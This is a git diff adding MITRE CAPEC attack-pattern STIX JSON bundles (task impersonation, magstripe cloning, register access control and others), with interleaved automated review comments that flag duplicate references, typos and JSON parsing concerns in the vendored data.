It should be emphasized that the presence of micro-services does not necessarily make a site vulnerable to attack, but they do provide additional complexity to a web page and therefore may contain vulnerabilities that support other attack patterns.\n ", + "x_capec_prerequisites": [ + "The target site must use micro-services that interact with the server and one or more of these micro-services must be vulnerable to some other attack pattern." + ], + "x_capec_resources_required": [ + "The attacker usually needs to be able to invoke micro-services directly in order to control the parameters that are used in their attack. The attacker may require other resources depending on the nature of the flaw in the targeted micro-service." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1809fa36-f249-4e55-80ab-26570fd24cab.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1809fa36-f249-4e55-80ab-26570fd24cab.json new file mode 100644 index 0000000000000000000000000000000000000000..637699b6e07bd9bb81659e84b32098b50b3c6d2c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1809fa36-f249-4e55-80ab-26570fd24cab.json 
@@ -0,0 +1,41 @@ +{ + "id": "bundle--bc074c31-11b3-4019-89c2-cdddfde0a8c9", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Data Interchange Protocols are used to transmit structured data between entities. These protocols are often specific to a particular domain (B2B: purchase orders, invoices, transport logistics and waybills, medical records). They are often, but not always, XML-based. Subverting the protocol can allow an adversary to impersonate others, discover sensitive information, control the outcome of a session, or perform other attacks. This type of attack targets invalid assumptions that may be inherent in implementers of the protocol, incorrect implementations of the protocol, or vulnerabilities in the protocol itself.", + "external_references": [ + { + "external_id": "CAPEC-277", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/277.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + } + ], + "id": "attack-pattern--1809fa36-f249-4e55-80ab-26570fd24cab", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Data Interchange Protocol Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c.json new file mode 100644 index 0000000000000000000000000000000000000000..923bad1e588fc514d2175b637bb06e98aaf5e26f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c.json 
@@ -0,0 +1,71 @@ +{ + "id": "bundle--a3d4d381-5d33-4cd7-af19-f7c2ae896b90", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses a social engineering techniques to produce a sense of obligation in the target to perform a certain action or concede some sensitive or key piece of information. Obligation has to do with actions one feels they need to take due to some sort of social, legal, or moral requirement, duty, contract, or promise. There are various techniques for fostering a sense of obligation to reciprocate or concede during ordinary modes of communication. One method is to compliment the target, and follow up the compliment with a question. If performed correctly the target may volunteer a key piece of information, sometimes involuntarily.", + "external_references": [ + { + "external_id": "CAPEC-418", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/418.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + }, + { + "description": "Social Engineering: The Art of Human Hacking, 2010, Wiley", + "external_id": "REF-360", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence Perception of Reciprocation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect 
potentially the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "An adversary develops a relationship with the target to foster a feeling of obligation in them to perform a certain action or concede some information. A perception of obligation/concession means that the target feels they need to behave in some way or perform some sort of action due to being morally or legally bound to do so." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--19015961-475c-438b-887b-e3d66a9143de.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--19015961-475c-438b-887b-e3d66a9143de.json new file mode 100644 index 0000000000000000000000000000000000000000..63798562c3c6f5b0e25331d1328e4f87ba46b6b1 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--19015961-475c-438b-887b-e3d66a9143de.json 
@@ -0,0 +1,40 @@ +{ + "id": "bundle--15c89f5b-ebb2-4b03-9583-bc25be44b7d2", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker duplicates the data on a Magnetic strip card (i.e. 'swipe card' or 'magstripe') to gain unauthorized access to a physical location or a person's private information. Magstripe cards encode data on a band of iron-based magnetic particles arrayed in a stripe along a rectangular card. Most magstripe card data formats conform to ISO standards 7810, 7811, 7813, 8583, and 4909. The primary advantage of magstripe technology is ease of encoding and portability, but this also renders magnetic strip cards susceptible to unauthorized duplication. If magstripe cards are used for access control, all an attacker need do is obtain a valid card long enough to make a copy of the card and then return the card to its location (i.e. a co-worker's desk). Magstripe reader/writers are widely available as well as software for analyzing data encoded on the cards. 
By swiping a valid card, it becomes trivial to make any number of duplicates that function as the original.", + "external_references": [ + { + "external_id": "CAPEC-397", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/397.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--19015961-475c-438b-887b-e3d66a9143de", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Cloning Magnetic Strip Cards", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7.json new file mode 100644 index 0000000000000000000000000000000000000000..af60b5f4079be9b8addeae8017ddbebef2aaa9ff --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7.json 
@@ -0,0 +1,104 @@
+{
+ "id": "bundle--6e9c1fe3-e66c-4995-9ff8-c4b1401d7795",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "An adversary who is authorized or has the ability to search known system resources, does so with the intention of gathering useful information. System resources include files, memory, and other aspects of the target system. In this pattern of attack, the adversary does not necessarily know what they are going to find when they start pulling data. This is different than CAPEC-150 where the adversary knows what they are looking for due to the common location.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-545",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/545.html"
+ },
+ {
+ "external_id": "CWE-1239",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/1239.html"
+ },
+ {
+ "external_id": "CWE-1243",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/1243.html"
+ },
+ {
+ "external_id": "CWE-1258",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/1258.html"
+ },
+ {
+ "external_id": "CWE-1266",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/1266.html"
+ },
+ {
+ "external_id": "CWE-1272",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/1272.html"
+ },
+ {
+ "external_id": "CWE-1278",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/1278.html"
+ },
+ {
+ "external_id": "CWE-1323",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/1323.html"
+ },
+ {
+ "external_id": "CWE-1258",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/1258.html"
+ },
+ {
+ "external_id": "CWE-1330",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/1330.html"
+ },
+ {
+ "description": "Data from Local System",
+ "external_id": "T1005",
+ "source_name": "ATTACK",
+ "url": "https://attack.mitre.org/wiki/Technique/T1005"
+ },
+ {
+ "description": "Credentials from Password Stores:Keychain",
+ "external_id": "T1555.001",
+ "source_name": "ATTACK",
+ "url": "https://attack.mitre.org/wiki/Technique/T1555/001"
+ }
+ ],
+ "id": "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7",
+ "modified": "2023-01-24T00:00:00.000Z",
+ "name": "Pull Data from System Resources",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Standard",
+ "x_capec_can_follow_refs": [
+ "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2",
+ "attack-pattern--9d08b257-08f6-42e3-ad7e-41aaf07789a1",
+ "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95"
+ ],
+ "x_capec_child_of_refs": [
+ "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6"
+ ],
+ "x_capec_domains": [
+ "Software",
+ "Hardware"
+ ],
+ "x_capec_parent_of_refs": [
+ "attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b",
+ "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96",
+ "attack-pattern--a7ed6b37-4ede-4c34-bbb2-c422fb844d74",
+ "attack-pattern--9a7492fa-b46e-48bc-aae9-beb1d359171e"
+ ],
+ "x_capec_status": "Draft",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1995c522-a25d-46e4-b024-65172771a692.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1995c522-a25d-46e4-b024-65172771a692.json
new file mode 100644
index 0000000000000000000000000000000000000000..bcb7bc5a8947ed56999dde6eeb81bdbbacedc4bd
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1995c522-a25d-46e4-b024-65172771a692.json
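Review bot: The `external_references` array for CAPEC-545 contains CWE-1258 twice (once after CWE-1278 and again after CWE-1323), so any importer that builds a CAPEC-to-CWE mapping from this file will emit a duplicate edge unless it dedupes on `external_id`. This appears to be carried over from the upstream CAPEC 3.9 export rather than introduced locally, so the right fix is a dedupe step in whatever loads these bundles rather than hand-editing the vendored file; if the file is edited, drop the second `{ "external_id": "CWE-1258", "source_name": "cwe", "url": "http://cwe.mitre.org/data/definitions/1258.html" }` object. The two ATT&CK entries use the legacy `https://attack.mitre.org/wiki/Technique/...` path form; a resolver that follows these links should tolerate a redirect rather than assume the path is canonical.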
@@ -0,0 +1,83 @@
+{
+ "id": "bundle--41c61492-899a-41f1-bda4-441b9c4df2e8",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "An adversary, through a previously installed malicious application, impersonates an expected or routine task in an attempt to steal sensitive information or leverage a user's privileges.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-504",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/504.html"
+ },
+ {
+ "external_id": "CWE-1021",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/1021.html"
+ },
+ {
+ "description": "Masquerading: Masquerade Task or Service",
+ "external_id": "T1036.004",
+ "source_name": "ATTACK",
+ "url": "https://attack.mitre.org/wiki/Technique/T1036/004"
+ },
+ {
+ "description": "Adrienne Porter Felt, David Wagner, Phishing on Mobile Devices, 2011, University of California, Berkeley",
+ "external_id": "REF-434",
+ "source_name": "reference_from_CAPEC",
+ "url": "https://people.eecs.berkeley.edu/~daw/papers/mobphish-w2sp11.pdf"
+ }
+ ],
+ "id": "attack-pattern--1995c522-a25d-46e4-b024-65172771a692",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "Task Impersonation",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Standard",
+ "x_capec_child_of_refs": [
+ "attack-pattern--fc3a9a6f-66c9-4363-8ebd-9bd18725fff8"
+ ],
+ "x_capec_consequences": {
+ "Access_Control": [
+ "Gain Privileges"
+ ],
+ "Authentication": [
+ "Gain Privileges"
+ ]
+ },
+ "x_capec_domains": [
+ "Software"
+ ],
+ "x_capec_example_instances": [
+ "An adversary monitors the system task list for Microsoft Outlook in an attempt to determine when the application may prompt the user to enter their credentials to view encrypted email. Once the task is executed, the adversary impersonates the credential prompt to obtain the user's Microsoft Outlook encryption credentials. These credentials can then be leveraged by the adversary to read a user's encrypted email.",
+ "An adversary prompts a user to authorize an elevation of privileges, implying that a background task needs additional permissions to execute. The user accepts the privilege elevation, allowing the adversary to execute additional malware or tasks with the user's privileges."
+ ],
+ "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine suitable tasks to exploit: Determine what tasks exist on the target system that may result in a user providing sensitive information.

  2. Techniques
    Determine what tasks prompt a user for their credentials.
    Determine what tasks may prompt a user to authorize a process to execute with elevated privileges.

Exploit

  1. Impersonate Task: Impersonate a legitimate task, either expected or unexpected, in an attempt to gain user credentials or to ride the user's privileges.

  2. Techniques
    Prompt a user for their credentials, while making the user believe the credential request is legitimate.
    Prompt a user to authorize a task to run with elevated privileges, while making the user believe the request is legitimate.
",
+ "x_capec_extended_description": "\n When impersonating an expected task, the adversary monitors the task list maintained by the operating system and waits for a specific legitimate task to become active. Once the task is detected, the malicious application launches a new task in the foreground that mimics the user interface of the legitimate task. At this point, the user thinks that they are interacting with the legitimate task that they started, but instead they are interacting with the malicious application. Once the adversary's goal is reached, the malicious application can exit, leaving the original trusted application visible and the appearance that nothing out of the ordinary has occurred.\n A second approach entails the adversary impersonating an unexpected task, but one that may often be spawned by legitimate background processes. For example, an adversary may randomly impersonate a system credential prompt, implying that a background process requires authentication for some purpose. The user, believing they are interacting with a legitimate task, enters their credentials or authorizes the use of their stored credentials, which the adversary then leverages for nefarious purposes. This type of attack is most often used to obtain sensitive information (e.g., credentials) from the user, but may also be used to ride the user's privileges.\n ",
+ "x_capec_likelihood_of_attack": "Medium",
+ "x_capec_parent_of_refs": [
+ "attack-pattern--f7a0e7bd-d24a-4390-b365-9e71f22e4e06"
+ ],
+ "x_capec_prerequisites": [
+ "The adversary must already have access to the target system via some means.",
+ "A legitimate task must exist that an adversary can impersonate to glean credentials.",
+ "The user's privileges allow them to execute certain tasks with elevated privileges."
+ ],
+ "x_capec_resources_required": [
+ "Malware or some other means to initially comprise the target system.",
+ "Additional malware to impersonate a legitimate task."
+ ],
+ "x_capec_skills_required": {
+ "Low": "Once an adversary has gained access to the target system, impersonating a task is trivial."
+ },
+ "x_capec_status": "Stable",
+ "x_capec_typical_severity": "High",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--19f01fde-7707-4938-afb5-daa22bf8c93f.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--19f01fde-7707-4938-afb5-daa22bf8c93f.json
new file mode 100644
index 0000000000000000000000000000000000000000..1d2ce5ae1f38a665624d8afdbb6af6b7b05b8aaf
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--19f01fde-7707-4938-afb5-daa22bf8c93f.json
@@ -0,0 +1,29 @@
+{
+ "id": "bundle--3663d783-93a2-4e67-a24c-5bfbdea74738",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "This attack pattern has been deprecated. Please refer to CAPEC:30 - Hijacking a Privileged Thread of Execution.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-235",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/235.html"
+ }
+ ],
+ "id": "attack-pattern--19f01fde-7707-4938-afb5-daa22bf8c93f",
+ "modified": "2018-07-31T00:00:00.000Z",
+ "name": "DEPRECATED: Implementing a callback to system routine (old AWT Queue)",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Detailed",
+ "x_capec_status": "Deprecated",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
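Review bot: The `x_capec_execution_flow` value in the CAPEC-504 file is shown here with raw line breaks between `"x_capec_execution_flow": "` and the closing `",`, and a strict RFC 8259 parser rejects unescaped control characters inside a string. If that is only how this page rendered the upstream `\n`-escaped HTML, nothing is wrong on disk; if the committed file really contains bare newlines there, `json.load` and every STIX library will fail on this bundle, so it is worth running the file through a strict parser before relying on it. Separately, `x_capec_resources_required` reads "means to initially comprise the target system", which should be `"Malware or some other means to initially compromise the target system."`. Note the anchor line also carries the whole CAPEC-235 deprecation stub, which needs no review.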
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810.json
new file mode 100644
index 0000000000000000000000000000000000000000..6beda7bb8bc73641938088571130163bfc41f302
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810.json
@@ -0,0 +1,89 @@
+{
+ "id": "bundle--d7416c5e-20a5-4978-afce-4ba510867553",
+ "objects": [
+ {
+ "created": "2021-10-21T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "\n An adversary exploits missing or incorrectly configured access control within registers to read/write data that is not meant to be obtained or modified by a user.\n ",
+ "external_references": [
+ {
+ "external_id": "CAPEC-680",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/680.html"
+ },
+ {
+ "external_id": "CWE-1224",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/1224.html"
+ },
+ {
+ "external_id": "CWE-1231",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/1231.html"
+ },
+ {
+ "external_id": "CWE-1233",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/1233.html"
+ },
+ {
+ "external_id": "CWE-1262",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/1262.html"
+ },
+ {
+ "external_id": "CWE-1283",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/1283.html"
+ },
+ {
+ "description": "Brandon Hill, Huge Intel CPU Bug Allegedly Causes Kernel Memory Vulnerability With Up To 30% Performance Hit In Windows And Linux, 2018--01---02, David Altavilla and Hot Hardware, Inc",
+ "external_id": "REF-693",
+ "source_name": "reference_from_CAPEC",
+ "url": "https://hothardware.com/news/intel-cpu-bug-kernel-memory-isolation-linux-windows-macos"
+ }
+ ],
+ "id": "attack-pattern--1abd165a-57e9-4b78-9221-7b6fcdc57810",
+ "modified": "2021-10-21T00:00:00.000Z",
+ "name": "Exploitation of Improperly Controlled Registers",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Detailed",
+ "x_capec_child_of_refs": [
+ "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b",
+ "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac"
+ ],
+ "x_capec_consequences": {
+ "Confidentiality": [
+ "Read Data"
+ ],
+ "Integrity": [
+ "Modify Data"
+ ]
+ },
+ "x_capec_domains": [
+ "Hardware",
+ "Hardware"
+ ],
+ "x_capec_example_instances": [
+ "\n During a System-on-Chip's (SoC) secure boot process, the code to be authenticated is measured to determine the code's validity. This entails the one-way hash of the code binary being calculated and extended to the previous hash. The value obtained after completion of the boot flow is then stored in a register with the intent of later verifying this value to determine if the boot flow has been tampered with. However, the register being used does not prevent an adversary from modifying the register's contents, which can result in the adversary spoofing the measurement data used in the attestation process.\n "
+ ],
+ "x_capec_extended_description": "\n Hardware systems often utilize trusted lock bits to prevent a set of registers from being written to or to restrict a register to only being written to once. Registers are also frequently used to store sensitive data leveraged in additional security operations, such as secure booting, authenticating code, device attestation, and more. However, the access control mechanisms meant to protect these registers may be fully missing or ineffective due to misconfiguration. If an adversary is able to discover improper access controls surrounding registers, it could result in the adversary obtaining sensitive data and/or modifying data that is meant to be immutable. This can ultimately result in processes like secure boot being circumvented or in protected configurations being modified.\n ",
+ "x_capec_likelihood_of_attack": "Medium",
+ "x_capec_prerequisites": [
+ "Awareness of the hardware being leveraged.",
+ "Access to the hardware being leveraged."
+ ],
+ "x_capec_skills_required": {
+ "High": "Intricate knowledge of registers."
+ },
+ "x_capec_status": "Draft",
+ "x_capec_typical_severity": "High",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b.json
new file mode 100644
index 0000000000000000000000000000000000000000..2abf9ccdf928ba5a1b24a2c84617965f17bf7a1a
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b.json
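Review bot: `x_capec_domains` for CAPEC-680 is `["Hardware", "Hardware"]`, a duplicated entry that will double-count this pattern in any per-domain grouping or faceted search built over the corpus; the array should be `"x_capec_domains": [ "Hardware" ]`, or the loader should dedupe domain lists on import since this is vendored upstream data. The example instance is the practitioner-relevant part: a measurement register used for attestation only has value if it is extend-only or write-once, and the CWE mappings listed (1224, 1231, 1233, 1262, 1283) are exactly the lock-bit and access-control weaknesses that break that property, so a consumer linking this entry to a mitigation should point at the register-locking controls rather than at the cited Meltdown news article (REF-693), which is only loosely related to register access control.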
@@ -0,0 +1,49 @@
+{
+ "id": "bundle--183a7be5-bae0-4d0a-bac2-4503ce85a4d8",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "An adversary examines screenshot images created by iOS in an attempt to obtain sensitive information. This attack targets temporary screenshots created by the underlying OS while the application remains open in the background.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-498",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/498.html"
+ },
+ {
+ "external_id": "CWE-359",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/359.html"
+ },
+ {
+ "description": "Jonathan Zdziarksi, Hacking and Securing iOS Applications (First Edition), 2012, O'Reilly Media, Inc.",
+ "external_id": "REF-426",
+ "source_name": "reference_from_CAPEC"
+ }
+ ],
+ "id": "attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b",
+ "modified": "2023-01-24T00:00:00.000Z",
+ "name": "Probe iOS Screenshots",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Detailed",
+ "x_capec_child_of_refs": [
+ "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7"
+ ],
+ "x_capec_domains": [
+ "Software"
+ ],
+ "x_capec_extended_description": "These images are used by iOS to aid in the visual transition between open applications and improve the user's experience with a device. An application can be at risk even if it properly protects sensitive information when at rest. If the application displays sensitive information on the screen, then the potential exists for iOS to unintentionally record that information in an image file. An adversary can retrieve these images either by gaining access to the image files, or by physically obtaining the device and leveraging the multitasking switcher interface. This attack differs from CAPEC-648, which targets intentional screenshots initiated by an end-user that are stored in the device's storage.",
+ "x_capec_prerequisites": [
+ "This type of an attack requires physical access to a device to either excavate the image files (potentially by leveraging a Jailbreak) or view the screenshots through the multitasking switcher (by double tapping the home button on the device)."
+ ],
+ "x_capec_status": "Draft",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29.json
new file mode 100644
index 0000000000000000000000000000000000000000..50a0029ed069cfca97609b74ef01b0ced6aa9932
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29.json
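Review bot: The single `x_capec_prerequisites` entry for CAPEC-498 ties the attack to "double tapping the home button", which is a gesture detail rather than a prerequisite; devices without a home button reach the same app switcher by a different gesture, so the condition a defender should record is physical access to the device plus an application that was backgrounded while showing sensitive content. A wording such as `"This type of an attack requires physical access to a device to either excavate the image files (potentially by leveraging a Jailbreak) or view the screenshots through the multitasking switcher."` keeps the prerequisite accurate across device generations. The REF-426 author name is misspelled as "Zdziarksi" and should read "Jonathan Zdziarski"; since this is vendored upstream data, both are candidates for an import-time override rather than an in-place edit.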
@@ -0,0 +1,71 @@
+{
+ "id": "bundle--eb2cd750-14ab-4f5a-ae2a-ca236b54048b",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "An adversary utilizes a hash function extension/padding weakness, to modify the parameters passed to the web service requesting authentication by generating their own call in order to generate a legitimate signature hash (as described in the notes), without knowledge of the secret token sometimes provided by the web service.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-461",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/461.html"
+ },
+ {
+ "external_id": "CWE-328",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/328.html"
+ },
+ {
+ "external_id": "CWE-290",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/290.html"
+ },
+ {
+ "description": "Thai Duong, Juliano Rizzo, Flickr's API Signature Forgery Vulnerability, 2009--09---28",
+ "external_id": "REF-398",
+ "source_name": "reference_from_CAPEC",
+ "url": "http://netifera.com/research/flickr_api_signature_forgery.pdf"
+ }
+ ],
+ "id": "attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "Web Services API Signature Forgery Leveraging Hash Function Extension Weakness",
